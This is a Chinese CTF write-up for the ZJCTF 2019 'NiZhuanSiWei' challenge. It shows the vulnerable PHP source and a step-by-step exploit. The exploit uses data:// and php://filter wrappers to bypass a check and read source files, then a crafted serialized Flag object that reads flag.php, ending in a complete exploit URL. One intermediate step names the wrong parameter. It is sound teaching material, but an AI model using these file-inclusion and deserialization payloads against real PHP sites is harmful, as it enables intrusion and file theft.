1. 程式人生 > 其它 >[ZJCTF 2019]NiZhuanSiWei 1

[ZJCTF 2019]NiZhuanSiWei 1

一 前置知識點

file_get_contents函式 — 將整個檔案讀入一個字串

ctf中偽協議總結

二 解題

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    
if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>

通過data偽協議寫入檔案繞過第一次檢查,不加base64編碼也可以,加上防止被某些檢查給ban掉。

?file=data://
text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

直接file=useless.php是無法讀取php的,php會被執行。所以需要利用php偽協議中的filter過濾器讀取useless.php的base64編碼。

file=php://filter/read=convert.base64-encode/resource=useless.php

解碼得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if
(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>

怎麼去給這個類的file成員變數賦上flag.php呢。

else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }

如果我們給變數password賦上 經過序列化的並且file變數為flag.php的類Flag,這樣的話,經過unserialize函式,

password變數被反序列化一個類,並且經過echo,會把這個類執行並輸出。

所以本地執行一下構造payload

<?php  

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}
$a = new Flag();//建立物件完之後再序列化
echo serialize($a);
?>  

結果為

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  

不要忘記給file變數賦值上useless.php,這樣才能被包含上。總的payload為

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}